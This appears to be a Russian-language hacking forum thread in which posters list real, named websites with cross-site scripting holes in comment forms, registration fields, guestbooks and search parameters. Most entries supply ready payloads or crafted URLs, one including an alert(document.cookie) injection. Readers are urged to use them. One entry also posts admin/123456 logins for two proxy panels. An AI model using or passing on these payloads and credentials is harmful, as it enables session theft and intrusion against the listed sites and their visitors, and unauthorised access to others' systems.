Еще здесь такой же форум и как следствие тут тоже активная xss в заголовке темы на форуме. http://forum.deti.mail.ru/
http://www.origitea.ru/default.aspx?404;http://www.origitea.ru:80/guest Визде пишем <script>alert()</script>
www.pcweek.ru уязвимы комментарии пример http://www.pcweek.ru/themes/detail.php?ID=109663&THEME_ID=0&SPHERE_ID=?add-comment
http://www.themobstergame.com/ / Уязвима Регистрация Ни одно поле не фильтруется "><script>('XSS')</script>
хсс в модуле, после http://www.asapmachineco.com/index.php?module=ath&banner=> можно прописать любую команду... ну юзайте короче ))) Code: http://www.asapmachineco.com/index.php?module=ath&banner=><a href=http://for-hack.ru>N1K70_SITE</a><script>alert(document.cookie)</script>
Kanalia.ru - сайт обо мне! в каментах галлереи не фильтруеццо имя отправителя http://kanalia.ru/gallery/
_http://checkproxy.nnm.netserv.name/ admin 123456 _http://queen-love.com/proxy5/ admin 123456 Юзайте и не просите больше никого о халявных прокси.
http://www.all-biz.info/ru/ при регистрации уязвимы пактически все поля(для активных XSS), вчастности поле "о предриятии", зарегиться до конца неудалось- за регу требют 35400 руб ну а чтоб вам небыло скушно вот вам хоть и пассивная но тоже XSS))) http://www.all-biz.info/ru/enterprises/?btn_search=1&findentry=%3Cscript%3Ealert%28%27%D0%B1%D0%B0%D0%BC%D1%81%27%29%3C%2Fscript%3E&cs=&ac_category=&btn_search=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C
svadbann.ru Гостевая книга http://www.svadbann.ru/q_answer.html Активны все три поля, сообщение, имя, мыло
Сайт Российских Сутенёров http://www.suter.ru/blacklist.html POST-форма, поле "Дополнительно: (краткое описание происшетшего)"
karaul.ru/ Xss найдена в добавление комментария. Вот пример: HTML: _http://karaul.ru/30.12.2004/13/comments _http://karaul.ru/09.06.2008/11/comments В поле имя вводите стандартное: PHP: <script>alert('antichat.ru')</script> И получаете желаемое!Хочу сказать,что караул.ру является довольно посещаемым ресурсом.
